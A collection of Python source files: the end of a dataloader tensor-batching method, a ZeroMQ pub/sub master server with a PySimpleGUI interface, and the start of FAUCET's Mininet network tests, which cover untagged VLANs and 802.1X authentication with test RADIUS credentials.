                offsets_tensor = offsets_tensor[:, None]
            tensors.append(offsets_tensor)
        del gdf, offsets
        return tensors

    @annotate("_handle_tensors", color="darkgreen", domain="nvt_python")
    def _handle_tensors(self, cats, conts, labels):
        """Assemble one batch's (feature dict, labels) output, applying the
        sparse conversion for columns listed in sparse_names."""
        X = {}
        for tensor, names in zip([cats, conts], [self.cat_names, self.cont_names]):
            lists = {}
            if isinstance(tensor, tuple):
                tensor, lists = tensor
            names = [i for i in names if i not in lists]

            # now add in any scalar tensors
            if len(names) > 1:
                tensors = self._tensor_split(tensor, len(names), axis=1)
                lists.update(zip(names, tensors))
            elif len(names) == 1:
                lists[names[0]] = tensor
            X.update(lists)

        for column_name in X:
            if column_name in self.sparse_names:
                if column_name not in self.sparse_max:
                    raise ValueError(
                        f"Did not convert {column_name} to sparse due to missing sparse_max entry"
                    )
                X[column_name] = self._to_sparse_tensor(X[column_name], column_name)

        # TODO: use dict for labels as well?
        # would require output layers to match naming
        if len(self.label_names) > 1:
            labels = self._tensor_split(labels, len(self.label_names), axis=1)
        return X, labels
|
talaMaster.py | #!/usr/bin/env python3
################################################################################
# Author(s): Aladi Akoh, ............
# Professor: Dr. Jeff McGough
# Usage: Start up talaMaster on a terminal using the command:
# ./talaMaster.py
# Start up another terminal and run the client program using the command:
# ./name_of_client.py
################################################################################
import time
import zmq
import threading as thr
from multiprocessing import Process
# Imports from TALA GUI CODE
import PySimpleGUI as sg
import numpy as np
import networkx as nx
import pandas as pd
import matplotlib
from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg
import matplotlib.pyplot as plt
################################################################################
# Function to decode received message from client (pub/sub)
################################################################################
def split_message(message):
    """Decode a client request of the form ``"<channel> <comm_type>"``.

    Returns a ``(channel, comm_type)`` tuple.  Raises ValueError when the
    message does not contain exactly two whitespace-separated fields.
    """
    channel_name, request_kind = message.split()
    return channel_name, request_kind
################################################################################
# Function to send correct port number to client(pub/sub)
################################################################################
def pack(comm_type,pub_port, sub_port, socket):
    """Reply to a client with the forwarder port matching its role.

    A PUBLISHER must connect to the forwarder's subscriber (frontend) port;
    a SUBSCRIBER must connect to the forwarder's publisher (backend) port.
    ``socket`` is the REP socket the request arrived on.
    """
    # If client is a publisher, send the Forwarder subscriber port number
    # If client is a subscriber, send the Forwarder publisher port number
    if (comm_type == "PUBLISHER"):
        print("Sending port number (", sub_port, ") to client")
        socket.send_string(sub_port)
    elif (comm_type == "SUBSCRIBER"):
        print("Sending port number (", pub_port, ") to client")
        socket.send_string(pub_port)
    else:
        # A REP socket must answer every request; replying with an error
        # string keeps the REQ/REP state machine from deadlocking when a
        # client sends an unknown communication type (previously no reply
        # was sent at all).
        print("Unknown communication type:", comm_type)
        socket.send_string("ERROR: unknown communication type")
################################################################################
# Function to fire up a forwader based on client's request
################################################################################
def forwader(sub_port, pub_port):
    """Run a zmq FORWARDER device bridging publishers and subscribers.

    Intended to run in its own process with its own zmq context: a SUB
    socket bound on ``sub_port`` collects from publishing clients, and a
    PUB socket bound on ``pub_port`` fans messages out to subscribers.
    Blocks inside ``zmq.device`` until it fails, then reports the error.
    """
    try:
        ctx = zmq.Context(1)
        # Client-facing side: subscribe to everything publishers send.
        incoming = ctx.socket(zmq.SUB)
        incoming.bind("tcp://*:%s" % sub_port)
        incoming.setsockopt_string(zmq.SUBSCRIBE, "")
        print("Forwader: Frontend subscriber socket initializing...")
        # Service-facing side: re-publish to subscribing clients.
        outgoing = ctx.socket(zmq.PUB)
        outgoing.bind("tcp://*:%s" % pub_port)
        print("Forwarder: Backend publisher socket initializing...")
        zmq.device(zmq.FORWARDER, incoming, outgoing)
    except Exception as err:
        print(err)
        print("bringing down zmq device")
################################################################################
# Sever Function here
################################################################################
def serverFunction(mode):
    """Master request loop: hand out per-channel forwarder port numbers.

    Binds a REP socket on the master port (``data[0]``) and answers each
    client request with the pub or sub port of that channel's forwarder,
    starting a new forwarder process for channels seen for the first time.
    Runs until the global ``server_run`` flag is cleared by the GUI thread.

    ``mode`` is currently unused (reserved for future server modes).
    """
    global server_run, data, channel_list, pub_port, sub_port
    # Socket to connect to clients
    print("Collecting updates from clients...")
    context = zmq.Context()
    master_reply = context.socket(zmq.REP)
    # Get the master port number from the main function & bind
    master_reply.bind("tcp://*:" + str(data[0]))
    # Initialize the port number counter for clients (pub/sub)
    port = data[1]
    while (server_run):
        # Wait for request from client(pub/sub) node
        try:
            message = master_reply.recv_string(flags=zmq.NOBLOCK)
        except zmq.Again:
            # No pending request: sleep briefly instead of busy-spinning,
            # which previously pinned a CPU core at 100%.
            time.sleep(0.05)
            continue
        # Decode the "<channel> <comm_type>" request from the client.
        channel_name, comm_type = split_message(message)
        # If the channel exists, reuse its existing port numbers; otherwise
        # allocate two fresh consecutive ports and start a forwarder.
        if (channel_name in channel_list):
            pub_port = channel_list[channel_name][0]
            sub_port = channel_list[channel_name][1]
            print("Ports exist in dictionary:", pub_port, sub_port)
        else:
            # Get new port numbers/increment port numbers dynamically
            port = str(int(port) + 1)
            pub_port = port
            port = str(int(port) + 1)
            sub_port = port
            # Update dictionary/create new pair if it does not exist
            channel_list.update({channel_name: (pub_port, sub_port, comm_type)})
            # Start the forwarder process here for the channel
            newchannel = Process(target=forwader, args=(sub_port, pub_port))
            newchannel.start()
        # Reply to the client with the port matching its role.
        pack(comm_type, pub_port, sub_port, master_reply)
        print(channel_list)
################################################################################
# mat plot helper code from PySimpleGUI Github
################################################################################
def draw_figure(canvas, figure, loc=(0, 0)):
    """Embed a matplotlib ``figure`` into a PySimpleGUI/Tk ``canvas``.

    Returns the FigureCanvasTkAgg aggregate so the caller can keep a
    reference (Tk garbage-collects unreferenced canvases).  ``loc`` is
    accepted for API compatibility but not used.
    """
    agg = FigureCanvasTkAgg(figure, canvas)
    agg.draw()
    widget = agg.get_tk_widget()
    widget.pack(side='top', fill='both', expand=1)
    return agg
################################################################################
# Main Function with the GUI code
################################################################################
def main():
    """Tala master GUI: configure ports and start/stop the master server."""
    global server_run, data, channel_list, master_port, channel_port_range
    global channel_port_base
    print("Tala v 3.0")
    master_port = data[0]
    channel_port_base = data[1]
    channel_port_range = data[2]
    sg.theme("Purple")
    # get figure from plot and extract height and width variables
    fig = plt.gcf()  # if using Pyplot then get the figure from the plot
    figure_x, figure_y, figure_w, figure_h = fig.bbox.bounds
    # Minimum functionality behind menu, currently only Exit has functionality
    menu_def = [['File', ['Open', 'Save', 'Exit']]]
    # Layout contains text, buttons, input, and canvas for graph.
    # NOTE(review): the two 'Show' buttons share the same event key, so
    # PySimpleGUI cannot distinguish them; give them distinct key= values
    # when the Show handlers are implemented.
    layout = [[sg.Menu(menu_def)],
              # Row 1
              [sg.Text("Master Port"), sg.InputText(master_port, key="masterPort", size=(10, 5)),
               sg.Text("Channel Port Base"), sg.InputText(channel_port_base, key="channelBase", size=(10, 5)),
               sg.Text("Channel Port Range"), sg.InputText(channel_port_range, key="channelRange", size=(10, 5)),
               sg.Button('Load')],
              # row 2
              [sg.Text("Tala Server"), sg.Button("Stop"), sg.Button("Start")],
              # row 3
              [sg.Text("Active Nodes"), sg.Button('Show'), sg.Button('Kill Node'),
               sg.Text("Active Channels"), sg.Button('Show'), sg.Button('Kill Channel')],
              # row 4
              [sg.Input(size=(20, 8)), sg.Text(" "), sg.Input(size=(20, 8))],
              # row 5
              [sg.Canvas(size=(figure_w / 2, figure_h / 2), key='-CANVAS-')]]
    window = sg.Window("Tala", layout, force_toplevel=True, finalize=True)
    # Only set once the user presses Start; joining an unstarted thread
    # previously raised NameError when the window was closed without Start.
    server_thr = None
    while True:
        event, values = window.read()
        if event in (None, "Exit"):
            server_run = False
            break
        # global variables being set through read of button presses using index keys
        if event == "Load":
            # If user decides to provide their own values, clear default vals
            data.clear()
            master_port = values["masterPort"]
            channel_port_base = values["channelBase"]
            channel_port_range = values["channelRange"]
            # If master port is same as channel port base, show an error.
            if (master_port == channel_port_base):
                sg.Popup("Master port cannot be the same with channel port base!")
                # TODO: Clear/reset master port and channel port base
            # Fill up data array with new values from user
            data.append(master_port)
            data.append(channel_port_base)
            data.append(channel_port_range)
            print("Data:", data)
        if event == "Start":
            print("Master Server Connecting...")
            server_run = True
            server_thr = thr.Thread(target=serverFunction, args=(1,))
            server_thr.start()
        # TODO: Handle the graph ("Show", "Kill Node", "Kill Channel") events
        if event == "Stop":
            print("Stopping server")
            server_run = False
    print("Cleaning up...")
    window.close()
    if server_thr is not None:
        server_thr.join()
    print('Exit Tala')
    server_run = False
# Server-run flag shared between the GUI and the server thread; the server
# loop only spins while this is True.  Initialized here so a "Stop"/"Exit"
# before "Start" can never hit an undefined global.
server_run = False
# Initialize the data array with default values:
# [master port, channel port base, channel port range]
data = [5000, 5050, 1000]
# Store the channels into a dictionary: name -> (pub_port, sub_port, type)
channel_list = dict()
if __name__ == "__main__":
    main()
mininet_tests.py | #!/usr/bin/env python3
"""Mininet tests for FAUCET."""
# pylint: disable=too-many-lines
# pylint: disable=missing-class-docstring,missing-function-docstring
# pylint: disable=too-many-arguments
import binascii
import collections
import copy
import itertools
import ipaddress
import json
import os
import random
import re
import shutil
import socket
import threading
import time
import unittest
from http.server import SimpleHTTPRequestHandler
from http.server import HTTPServer
import scapy.all
from mininet.log import error
from mininet.util import pmonitor
from faucet.config_parser_util import yaml_load
from clib import mininet_test_base
from clib import mininet_test_util
from clib.mininet_test_base import PEER_BGP_AS, IPV4_ETH, IPV6_ETH
MIN_MBPS = 100
CONFIG_BOILER_UNTAGGED = """
interfaces:
%(port_1)d:
native_vlan: 100
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
CONFIG_TAGGED_BOILER = """
interfaces:
%(port_1)d:
tagged_vlans: [100]
count_untag_vlan_miss: true
%(port_2)d:
tagged_vlans: [100]
count_untag_vlan_miss: true
%(port_3)d:
tagged_vlans: [100]
count_untag_vlan_miss: true
%(port_4)d:
tagged_vlans: [100]
count_untag_vlan_miss: true
"""
class QuietHTTPServer(HTTPServer):
    """HTTPServer variant that stays quiet: per-request handler errors are
    discarded rather than printed to stderr."""

    # Rebind the same address immediately between test runs (avoids
    # TIME_WAIT bind failures).
    allow_reuse_address = True
    # No socket timeout: block indefinitely waiting for requests.
    timeout = None

    @staticmethod
    def handle_error(_request, _client_address):
        # Swallow handler exceptions; BaseServer would otherwise print a
        # traceback for every failed request.
        return
class PostHandler(SimpleHTTPRequestHandler):
    """Request handler that appends POST bodies to the server's influx log."""

    def log_message(self, format, *args):  # pylint: disable=redefined-builtin
        """Suppress the default per-request stderr logging."""
        return

    def _log_post(self):
        """Append the request body, if any, to ``self.server.influx_log``."""
        body_len = int(self.headers.get('content-length', 0))
        body = self.rfile.read(body_len).decode().strip()
        if not body:
            return
        if not hasattr(self.server, 'influx_log'):
            return
        with open(self.server.influx_log, 'a', encoding='utf-8') as log_file:
            log_file.write(body + '\n')
class InfluxPostHandler(PostHandler):
    """Accept a POSTed payload, record it, and acknowledge with HTTP 204."""

    def do_POST(self):  # pylint: disable=invalid-name
        self._log_post()
        # 204 No Content: acknowledge the write without a response body.
        return self.send_response(204)
class SlowInfluxPostHandler(PostHandler):
    """Record the POST, then stall well past the server timeout and fail.

    Sleeping for three times ``self.server.timeout`` guarantees the client
    side gives up first — presumably used to simulate a slow/unhealthy
    collector; confirm at call sites.
    """

    def do_POST(self):  # pylint: disable=invalid-name
        self._log_post()
        time.sleep(self.server.timeout * 3)
        return self.send_response(500)
class FaucetTest(mininet_test_base.FaucetTestBase):
    """Common base class for all FAUCET Mininet tests in this module."""
    pass
class FaucetUntaggedTest(FaucetTest):
    """Basic untagged VLAN test."""

    HOST_NAMESPACE = {}
    N_UNTAGGED = 4
    N_TAGGED = 0
    LINKS_PER_HOST = 1
    # Event-socket heartbeat interval passed to the harness as a string —
    # presumably seconds; confirm in mininet_test_base.
    EVENT_SOCK_HEARTBEAT = '5'
    CONFIG_GLOBAL = """
vlans:
    100:
        description: "untagged"
"""
    # pylint: disable=invalid-name
    CONFIG = CONFIG_BOILER_UNTAGGED

    def setUp(self):
        """Build a one-switch topology with four untagged hosts and start it."""
        super().setUp()
        self.topo = self.topo_class(
            self.OVS_TYPE, self.ports_sock, self._test_name(), [self.dpid],
            n_tagged=self.N_TAGGED, n_untagged=self.N_UNTAGGED,
            links_per_host=self.LINKS_PER_HOST, hw_dpid=self.hw_dpid,
            host_namespace=self.HOST_NAMESPACE)
        self.start_net()

    def verify_events_log(self, event_log, timeout=10):
        """Poll until the event log catches up with Prometheus' event id and
        every required event type has been seen at least once."""
        required_events = {'CONFIG_CHANGE', 'PORT_CHANGE', 'L2_LEARN', 'PORTS_STATUS', 'EVENT_SOCK_HEARTBEAT'}
        for _ in range(timeout):
            prom_event_id = self.scrape_prometheus_var('faucet_event_id', dpid=False)
            event_id = None
            with open(event_log, 'r', encoding='utf-8') as event_log_file:
                for event_log_line in event_log_file.readlines():
                    event = json.loads(event_log_line.strip())
                    event_id = event['event_id']
                    # Seen event types are removed from the required set.
                    required_events -= set(event.keys())
            if prom_event_id == event_id:
                return
            time.sleep(1)
        self.assertEqual(prom_event_id, event_id)
        self.assertFalse(required_events)

    def test_untagged(self):
        """All hosts on the same untagged VLAN should have connectivity."""
        self._enable_event_log()
        self.ping_all_when_learned()
        self.flap_all_switch_ports()
        self.verify_traveling_dhcp_mac()
        self.gauge_smoke_test()
        self.prometheus_smoke_test()
        self.assertGreater(os.path.getsize(self.event_log), 0)
        self.verify_events_log(self.event_log)
class Faucet8021XBase(FaucetTest):
    """Base class for 802.1X tests.

    Topology: two supplicant hosts (ports 1 and 2), one plain ping host
    (port 3) and an NFV host (port 4, root namespace) that runs freeradius
    and captures EAPOL/RADIUS traffic for verification.
    """

    NUM_FAUCET_CONTROLLERS = 1
    NUM_GAUGE_CONTROLLERS = 1
    # Host index 3 (the NFV host) stays in the root namespace.
    HOST_NAMESPACE = {3: False}
    N_UNTAGGED = 4
    N_TAGGED = 0
    LINKS_PER_HOST = 1
    # Allocated dynamically in pre_start_net().
    RADIUS_PORT = None
    # Subclasses list the DOT1X events they expect to observe.
    DOT1X_EXPECTED_EVENTS = []
    SESSION_TIMEOUT = 3600
    LOG_LEVEL = 'DEBUG'

    CONFIG_GLOBAL = """
vlans:
    100:
        description: "untagged"
"""
    # NFV_INTF and RADIUS_PORT placeholders are substituted at runtime in
    # pre_start_net().
    CONFIG = """
        dot1x:
            nfv_intf: NFV_INTF
            nfv_sw_port: %(port_4)d
            radius_ip: 127.0.0.1
            radius_port: RADIUS_PORT
            radius_secret: SECRET
        interfaces:
            %(port_1)d:
                native_vlan: 100
                # 802.1x client.
                dot1x: True
            %(port_2)d:
                native_vlan: 100
                # 802.1X client.
                dot1x: True
            %(port_3)d:
                native_vlan: 100
                # ping host.
            %(port_4)d:
                output_only: True
                # "NFV host - interface used by controller."
"""

    # wpa_supplicant config for the first test identity.
    wpasupplicant_conf_1 = """
ap_scan=0
network={
    key_mgmt=IEEE8021X
    eap=MD5
    identity="user"
    password="microphone"
}
"""

    # wpa_supplicant config for the second test identity.
    wpasupplicant_conf_2 = """
ap_scan=0
network={
    key_mgmt=IEEE8021X
    eap=MD5
    identity="admin"
    password="megaphone"
}
"""

    # freeradius users file; {0} is filled with SESSION_TIMEOUT.
    freeradius_user_conf = """user   Cleartext-Password := "microphone"
        Session-timeout = {0}
admin   Cleartext-Password := "megaphone"
        Session-timeout = {0}
vlanuser1001  Cleartext-Password := "password"
        Tunnel-Type = "VLAN",
        Tunnel-Medium-Type = "IEEE-802",
        Tunnel-Private-Group-id = "radiusassignedvlan1"
vlanuser2222  Cleartext-Password := "milliphone"
        Tunnel-Type = "VLAN",
        Tunnel-Medium-Type = "IEEE-802",
        Tunnel-Private-Group-id = "radiusassignedvlan2"
filter_id_user_accept  Cleartext-Password := "accept_pass"
        Filter-Id = "accept_acl"
filter_id_user_deny  Cleartext-Password := "deny_pass"
        Filter-Id = "deny_acl"
"""

    eapol1_host = None
    eapol2_host = None
    ping_host = None
    nfv_host = None
    nfv_intf = None
    nfv_portno = None

    @staticmethod
    def _priv_mac(host_id):
        """Return the per-port private MAC 00:00:00:00:xx:xx for host_id."""
        two_byte_port_num = '%04x' % host_id
        two_byte_port_num_formatted = ':'.join((two_byte_port_num[:2], two_byte_port_num[2:]))
        return '00:00:00:00:%s' % two_byte_port_num_formatted

    def pre_start_net(self):
        """Resolve host handles, pick a free RADIUS port and finish the
        FAUCET config before the network starts."""
        self.eapol1_host, self.eapol2_host, self.ping_host, self.nfv_host = self.hosts_name_ordered()
        switch = self.first_switch()
        last_host_switch_link = switch.connectionsTo(self.nfv_host)[0]
        nfv_intf = [
            intf for intf in last_host_switch_link if intf in switch.intfList()][0]
        self.nfv_intf = str(nfv_intf)
        nfv_intf = self.nfv_host.intf()
        self.RADIUS_PORT = mininet_test_util.find_free_udp_port(self.ports_sock, self._test_name())
        self.CONFIG = self.CONFIG.replace('NFV_INTF', str(nfv_intf))
        self.CONFIG = self.CONFIG.replace('RADIUS_PORT', str(self.RADIUS_PORT))
        super()._init_faucet_config()

    def setUp(self):
        """Start the network, tcpdump captures, freeradius and event log."""
        super().setUp()
        self.topo = self.topo_class(
            self.OVS_TYPE, self.ports_sock, self._test_name(), [self.dpid],
            n_tagged=self.N_TAGGED, n_untagged=self.N_UNTAGGED,
            links_per_host=self.LINKS_PER_HOST, hw_dpid=self.hw_dpid,
            host_namespace=self.HOST_NAMESPACE)
        self.start_net()
        self.nfv_portno = self.port_map['port_4']
        self.host_drop_all_ips(self.nfv_host)
        # PIDs of background captures/daemons to kill in tearDown().
        self.nfv_pids = []
        tcpdump_args = '-e -n -U'
        self.eapol1_host.cmd(
            mininet_test_util.timeout_cmd(
                'tcpdump -w %s/%s-start.pcap %s ether proto 0x888e &' % (
                    self.tmpdir, self.eapol1_host.name, tcpdump_args), 300))
        self.nfv_host.cmd(
            mininet_test_util.timeout_cmd(
                'tcpdump -i %s-eth0 -w %s/eap-lo.pcap %s ether proto 0x888e &' % (
                    self.nfv_host.name, self.tmpdir, tcpdump_args), 300))
        self.nfv_pids.append(int(self.nfv_host.lastPid))
        self.nfv_host.cmd(
            mininet_test_util.timeout_cmd(
                'tcpdump -i lo -w %s/radius.pcap %s udp port %d &' % (
                    self.tmpdir, tcpdump_args, self.RADIUS_PORT), 300))
        self.nfv_pids.append(int(self.nfv_host.lastPid))
        self.radius_log_path = self.start_freeradius()
        self.nfv_pids.append(int(self.nfv_host.lastPid))
        self._enable_event_log(300)

    def tearDown(self, ignore_oferrors=False):
        """Kill background processes started on the NFV host, then clean up."""
        for pid in self.nfv_pids:
            self.nfv_host.cmd('kill %u' % pid)
        super().tearDown(ignore_oferrors=ignore_oferrors)

    def post_test_checks(self):
        """Common end-of-test verification: event log present and DOT1X
        events as expected."""
        self.assertGreater(os.path.getsize(self.event_log), 0)
        self.verify_dot1x_events_log()

    def verify_dot1x_events_log(self):
        """Assert every DOT1X_EXPECTED_EVENTS entry appears in the event log."""

        def replace_mac(host_no):
            """Map a HOSTn_MAC placeholder to the real host MAC address."""
            replacement_macs = {
                'HOST1_MAC': self.eapol1_host.MAC(),
                'HOST2_MAC': self.eapol2_host.MAC(),
                'HOST3_MAC': self.ping_host.MAC(),
                'HOST4_MAC': self.nfv_host.MAC(),
            }
            return replacement_macs.get(host_no, None)

        def insert_dynamic_values(dot1x_expected_events):
            """Substitute runtime dp_id, port numbers and MACs in-place."""
            for dot1x_event in dot1x_expected_events:
                top_level_key = list(dot1x_event.keys())[0]
                dot1x_params = {'dp_id': int(self.dpid)}
                for key, val in dot1x_event[top_level_key].items():
                    if key == 'port':
                        dot1x_params[key] = self.port_map[val]
                    elif key == 'eth_src':
                        dot1x_params[key] = replace_mac(val)
                dot1x_event[top_level_key].update(dot1x_params)

        if not self.DOT1X_EXPECTED_EVENTS:
            return
        dot1x_expected_events = copy.deepcopy(self.DOT1X_EXPECTED_EVENTS)
        insert_dynamic_values(dot1x_expected_events)
        with open(self.event_log, 'r', encoding='utf-8') as event_file:
            events_that_happened = []
            for event_log_line in event_file.readlines():
                if 'DOT1X' not in event_log_line:
                    continue
                event = json.loads(event_log_line.strip())
                events_that_happened.append(event['DOT1X'])
            for expected_event in dot1x_expected_events:
                self.assertTrue(expected_event in events_that_happened,
                                msg='expected event: {} not in events_that_happened {}'.format(
                                    expected_event, events_that_happened))

    @staticmethod
    def _eapol_filter(fields):
        """Build a tcpdump filter matching EAPOL frames plus extra fields."""
        return '(' + ' and '.join(('ether proto 0x888e',) + fields) + ')'

    def _success_eapol_filter(self, expect_success):
        """Filter for an EAP Success (0x03) or Failure (0x04) frame."""
        eap_code = '0x04'
        if expect_success:
            eap_code = '0x03'
        return self._eapol_filter(('ether[14:4] == 0x01000004', 'ether[18] == %s' % eap_code))

    def _logoff_eapol_filter(self):
        """Filter for an EAPOL-Logoff frame."""
        return self._eapol_filter(('ether[14:4] == 0x01020000',))

    def try_8021x(self, host, port_num, conf, and_logoff=False, terminate_wpasupplicant=False,
                  wpasup_timeout=180, tcpdump_timeout=30, expect_success=True):
        """Attempt an 802.1X authentication and validate counters.

        Returns True when the observed tcpdump result and Prometheus
        counter deltas match expectations, False otherwise.
        """
        if expect_success:
            self.wait_8021x_flows(port_num)
        port_labels = self.port_labels(port_num)
        # Snapshot per-port and per-DP dot1x counters before the attempt.
        success_total = self.scrape_prometheus_var(
            'port_dot1x_success_total', labels=port_labels, default=0)
        failure_total = self.scrape_prometheus_var(
            'port_dot1x_failure_total', labels=port_labels, default=0)
        logoff_total = self.scrape_prometheus_var(
            'port_dot1x_logoff_total', labels=port_labels, default=0)
        dp_success_total = self.scrape_prometheus_var(
            'dp_dot1x_success_total', default=0)
        dp_failure_total = self.scrape_prometheus_var(
            'dp_dot1x_failure_total', default=0)
        dp_logoff_total = self.scrape_prometheus_var(
            'dp_dot1x_logoff_total', default=0)
        tcpdump_filters = [self._success_eapol_filter(expect_success)]
        if and_logoff:
            tcpdump_filters.append(self._logoff_eapol_filter())
        tcpdump_packets = len(tcpdump_filters)
        tcpdump_filter = ' or '.join(tcpdump_filters)
        tcpdump_txt = self.tcpdump_helper(
            host, tcpdump_filter, [
                lambda: self.wpa_supplicant_callback(
                    host, port_num, conf, and_logoff,
                    timeout=wpasup_timeout,
                    terminate_wpasupplicant=terminate_wpasupplicant)],
            timeout=tcpdump_timeout, vflags='-vvv', packets=tcpdump_packets)
        if expect_success:
            self.wait_for_eap_success(host, self.get_wpa_ctrl_path(host))
            if not and_logoff:
                self.wait_8021x_success_flows(host, port_num)
        success = 'Success' in tcpdump_txt
        if expect_success != success:
            return False
        # Re-scrape counters and compare against the snapshot.
        new_success_total = self.scrape_prometheus_var(
            'port_dot1x_success_total', labels=port_labels, default=0)
        new_failure_total = self.scrape_prometheus_var(
            'port_dot1x_failure_total', labels=port_labels, default=0)
        new_logoff_total = self.scrape_prometheus_var(
            'port_dot1x_logoff_total', labels=port_labels, default=0)
        new_dp_success_total = self.scrape_prometheus_var(
            'dp_dot1x_success_total', default=0)
        new_dp_failure_total = self.scrape_prometheus_var(
            'dp_dot1x_failure_total', default=0)
        new_dp_logoff_total = self.scrape_prometheus_var(
            'dp_dot1x_logoff_total', default=0)
        if expect_success and success:
            self.assertGreater(new_success_total, success_total)
            self.assertGreater(new_dp_success_total, dp_success_total)
            self.assertEqual(failure_total, new_failure_total)
            self.assertEqual(dp_failure_total, new_dp_failure_total)
            logoff = 'logoff' in tcpdump_txt
            if logoff != and_logoff:
                return False
            if and_logoff:
                self.assertGreater(new_logoff_total, logoff_total)
            return True
        self.assertEqual(logoff_total, new_logoff_total)
        self.assertEqual(dp_logoff_total, new_dp_logoff_total)
        self.assertEqual(dp_success_total, new_dp_success_total)
        self.assertGreaterEqual(new_failure_total, failure_total)
        self.assertGreaterEqual(new_dp_failure_total, dp_failure_total)
        return False

    def retry_8021x(self, host, port_num, conf, and_logoff=False, retries=2, expect_success=True):
        """Retry try_8021x() up to ``retries`` times; True on first success."""
        for _ in range(retries):
            if self.try_8021x(host, port_num, conf, and_logoff, expect_success=expect_success):
                return True
            time.sleep(1)
        return False

    def wait_8021x_flows(self, port_no):
        """Wait for the EAPOL redirect flows for ``port_no`` to be installed."""
        port_actions = [
            'SET_FIELD: {eth_dst:%s}' % self._priv_mac(port_no), 'OUTPUT:%u' % self.nfv_portno]
        from_nfv_actions = [
            'SET_FIELD: {eth_src:01:80:c2:00:00:03}', 'OUTPUT:%d' % port_no]
        from_nfv_match = {
            'in_port': self.nfv_portno, 'dl_src': self._priv_mac(port_no), 'dl_type': 0x888e}
        self.wait_until_matching_flow(None, table_id=0, actions=port_actions)
        self.wait_until_matching_flow(from_nfv_match, table_id=0, actions=from_nfv_actions)

    def wait_8021x_success_flows(self, host, port_no):
        """Wait for the post-auth flow admitting the host's traffic."""
        from_host_actions = [
            'GOTO_TABLE:1']
        from_host_match = {
            'in_port': port_no, 'dl_src': host.MAC()}
        self.wait_until_matching_flow(from_host_match, table_id=0, actions=from_host_actions)

    def verify_host_success(self, eapol_host, port_no, wpasupplicant_conf, and_logoff):
        """Authenticate ``eapol_host`` and verify it gains connectivity."""
        self.one_ipv4_ping(
            eapol_host, self.ping_host.IP(), require_host_learned=False, expected_result=False)
        self.assertTrue(
            self.try_8021x(
                eapol_host, port_no, wpasupplicant_conf, and_logoff=and_logoff))
        self.one_ipv4_ping(
            self.eapol1_host, self.ping_host.IP(), require_host_learned=False, expected_result=True)

    def wpa_supplicant_callback(self, host, port_num, conf, and_logoff, timeout=10, terminate_wpasupplicant=False):
        """(Re)start wpa_supplicant on ``host`` and optionally log off again."""
        wpa_ctrl_path = self.get_wpa_ctrl_path(host)
        if os.path.exists(wpa_ctrl_path):
            # Kill any stale supplicant still holding the control socket.
            self.terminate_wpasupplicant(host)
            for pid in host.cmd('lsof -t %s' % wpa_ctrl_path).splitlines():
                try:
                    os.kill(int(pid), 15)
                except (ValueError, ProcessLookupError):
                    pass
            try:
                shutil.rmtree(wpa_ctrl_path)
            except FileNotFoundError:
                pass
        log_prefix = host.name + '_'
        self.start_wpasupplicant(
            host, conf, timeout=timeout,
            wpa_ctrl_socket_path=wpa_ctrl_path, log_prefix=log_prefix)
        if and_logoff:
            # Full round trip: auth, ping OK, logoff, ping blocked again.
            self.wait_for_eap_success(host, wpa_ctrl_path)
            self.wait_until_matching_flow(
                {'eth_src': host.MAC(), 'in_port': port_num}, table_id=0)
            self.one_ipv4_ping(
                host, self.ping_host.IP(), require_host_learned=False)
            host.cmd('wpa_cli -p %s logoff' % wpa_ctrl_path)
            self.wait_until_no_matching_flow(
                {'eth_src': host.MAC(), 'in_port': port_num}, table_id=0)
            self.one_ipv4_ping(
                host, self.ping_host.IP(),
                require_host_learned=False, expected_result=False)
        if terminate_wpasupplicant:
            self.terminate_wpasupplicant(host)

    def terminate_wpasupplicant(self, host):
        """Ask the supplicant on ``host`` to shut down via wpa_cli."""
        wpa_ctrl_path = self.get_wpa_ctrl_path(host)
        host.cmd('wpa_cli -p %s terminate' % wpa_ctrl_path)

    def get_wpa_ctrl_path(self, host):
        """Return the wpa_supplicant control-socket directory for ``host``."""
        # NOTE(review): joining tmpdir with a string that already embeds
        # tmpdir yields <tmpdir>/<tmpdir>/<host>-wpasupplicant — looks
        # unintentional but is relied on consistently; confirm upstream.
        wpa_ctrl_path = os.path.join(
            self.tmpdir, '%s/%s-wpasupplicant' % (self.tmpdir, host.name))
        return wpa_ctrl_path

    @staticmethod
    def get_wpa_status(host, wpa_ctrl_path):
        """Return the supplicant's reported EAP state, or None."""
        status = host.cmdPrint('wpa_cli -p %s status' % wpa_ctrl_path)
        for line in status.splitlines():
            if line.startswith('EAP state'):
                return line.split('=')[1].strip()
        return None

    def wait_for_eap_success(self, host, wpa_ctrl_path, timeout=5):
        """Poll until the supplicant reports EAP SUCCESS or fail the test."""
        for _ in range(timeout):
            eap_state = self.get_wpa_status(host, wpa_ctrl_path)
            if eap_state == 'SUCCESS':
                return
            time.sleep(1)
        self.fail('did not get EAP success: %s' % eap_state)

    def wait_for_radius(self, radius_log_path):
        """Block until freeradius logs that it is ready to serve."""
        self.wait_until_matching_lines_from_file(
            r'.*Ready to process requests', radius_log_path)

    def start_freeradius(self):
        """Copy and patch the system freeradius config into tmpdir, start
        the daemon on the NFV host and return its log path."""
        radius_log_path = '%s/radius.log' % self.tmpdir
        listen_match = r'(listen {[^}]*(limit {[^}]*})[^}]*})|(listen {[^}]*})'
        listen_config = """listen {
    type = auth
    ipaddr = *
    port = %s
}
listen {
    type = acct
    ipaddr = *
    port = %d
}""" % (self.RADIUS_PORT, self.RADIUS_PORT + 1)
        if os.path.isfile('/etc/freeradius/users'):
            # Assume we are dealing with freeradius 2 configuration
            shutil.copytree('/etc/freeradius/', '%s/freeradius' % self.tmpdir)
            users_path = '%s/freeradius/users' % self.tmpdir
            with open('%s/freeradius/radiusd.conf' % self.tmpdir, 'r+', encoding='utf-8') as default_site:
                default_config = default_site.read()
                default_config = re.sub(listen_match, '', default_config)
                default_site.seek(0)
                default_site.write(default_config)
                default_site.write(listen_config)
                default_site.truncate()
        else:
            # Assume we are dealing with freeradius >=3 configuration
            # NOTE(review): the character class [0.9] in the regex below
            # looks like a typo for [0-9]; it happens to match x.0/x.9
            # minor versions — confirm against supported freeradius versions.
            freerad_version = os.popen(
                r'freeradius -v | egrep -o -m 1 "Version ([0-9]\.[0.9])"').read().rstrip()
            freerad_major_version = freerad_version.split(' ')[1]
            shutil.copytree('/etc/freeradius/%s/' % freerad_major_version,
                            '%s/freeradius' % self.tmpdir)
            users_path = '%s/freeradius/mods-config/files/authorize' % self.tmpdir
